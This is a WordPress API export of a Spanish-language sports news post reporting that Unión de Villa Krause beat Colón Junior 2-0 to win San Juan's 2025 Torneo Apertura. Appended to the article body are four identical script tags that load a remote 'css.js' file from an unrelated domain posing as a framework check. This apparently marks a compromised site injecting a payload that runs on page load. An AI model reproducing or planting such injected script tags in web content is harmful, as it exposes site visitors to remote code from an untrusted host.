{"id":23365,"date":"2025-07-21T13:18:56","date_gmt":"2025-07-21T16:18:56","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=23365"},"modified":"2026-02-02T19:00:35","modified_gmt":"2026-02-02T22:00:35","slug":"union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/","title":{"rendered":"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">En una nueva final disputada en el Estadio del Bicentenario, el Azul de Villa Krause se consagr\u00f3 campe\u00f3n tras vencer a Col\u00f3n Junior.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El f\u00fatbol sanjuanino ya tiene a su campe\u00f3n del Torneo Apertura 2025: Uni\u00f3n de Villa Krause. En la tarde del D\u00eda del Amigo, y ante una multitud que coparon las tribunas, el Azul venci\u00f3 2 a 0 a Col\u00f3n Junior y se qued\u00f3 con el t\u00edtulo.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La final se disput\u00f3 en el Estadio San Juan del Bicentenario, que una vez m\u00e1s fue escenario de una definici\u00f3n importante para el f\u00fatbol local, reafirmando su jerarqu\u00eda como sede de grandes eventos.<br>Uni\u00f3n, que hab\u00eda sido el equipo m\u00e1s regular durante la fase clasificatoria, coron\u00f3 su gran campa\u00f1a con un triunfo contundente y merecido. Los goles del campeonato los marc\u00f3 Luciano Riveros, en un segundo tiempo que quedar\u00e1 para el recuerdo de todos los hinchas Azules.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>En una nueva final disputada en el Estadio del Bicentenario, el Azul de Villa Krause se consagr\u00f3 campe\u00f3n tras vencer a Col\u00f3n Junior. El f\u00fatbol sanjuanino ya tiene a su campe\u00f3n del Torneo Apertura 2025: Uni\u00f3n de Villa Krause. En la tarde del D\u00eda del Amigo, y ante una multitud que coparon las tribunas, el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":23181,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24,178],"tags":[],"class_list":["post-23365","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-futbol","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"En una nueva final disputada en el Estadio del Bicentenario, el Azul de Villa Krause se consagr\u00f3 campe\u00f3n tras vencer a Col\u00f3n Junior. El f\u00fatbol sanjuanino ya tiene a su campe\u00f3n del Torneo Apertura 2025: Uni\u00f3n de Villa Krause. En la tarde del D\u00eda del Amigo, y ante una multitud que coparon las tribunas, el [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-21T16:18:56+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T22:00:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/06\/351659w790h602c.jpg.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"790\" \/>\n\t<meta property=\"og:image:height\" content=\"602\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino\",\"datePublished\":\"2025-07-21T16:18:56+00:00\",\"dateModified\":\"2026-02-02T22:00:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/\"},\"wordCount\":171,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/351659w790h602c.jpg.webp\",\"articleSection\":[\"Futbol\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/\",\"name\":\"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino - San Juan Deportes\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/351659w790h602c.jpg.webp\",\"datePublished\":\"2025-07-21T16:18:56+00:00\",\"dateModified\":\"2026-02-02T22:00:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/351659w790h602c.jpg.webp\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/06\\\/351659w790h602c.jpg.webp\",\"width\":790,\"height\":602},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/07\\\/21\\\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/","og_locale":"es_ES","og_type":"article","og_title":"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino - San Juan Deportes","og_description":"En una nueva final disputada en el Estadio del Bicentenario, el Azul de Villa Krause se consagr\u00f3 campe\u00f3n tras vencer a Col\u00f3n Junior. El f\u00fatbol sanjuanino ya tiene a su campe\u00f3n del Torneo Apertura 2025: Uni\u00f3n de Villa Krause. En la tarde del D\u00eda del Amigo, y ante una multitud que coparon las tribunas, el [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-07-21T16:18:56+00:00","article_modified_time":"2026-02-02T22:00:35+00:00","og_image":[{"width":790,"height":602,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/06\/351659w790h602c.jpg.webp","type":"image\/webp"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/"},"author":{"name":"admin","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino","datePublished":"2025-07-21T16:18:56+00:00","dateModified":"2026-02-02T22:00:35+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/"},"wordCount":171,"commentCount":0,"publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/06\/351659w790h602c.jpg.webp","articleSection":["Futbol","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/","name":"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino - San Juan Deportes","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/06\/351659w790h602c.jpg.webp","datePublished":"2025-07-21T16:18:56+00:00","dateModified":"2026-02-02T22:00:35+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/06\/351659w790h602c.jpg.webp","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/06\/351659w790h602c.jpg.webp","width":790,"height":602},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/07\/21\/union-el-campeon-del-torneo-apertura-del-futbol-sanjuanino\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Uni\u00f3n, el campe\u00f3n del Torneo Apertura del f\u00fatbol sanjuanino"}]},{"@type":"WebSite","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website","url":"http:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"http:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23365","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=23365"}],"version-history":[{"count":5,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23365\/revisions"}],"predecessor-version":[{"id":28740,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23365\/revisions\/28740"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/23181"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=23365"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=23365"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=23365"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}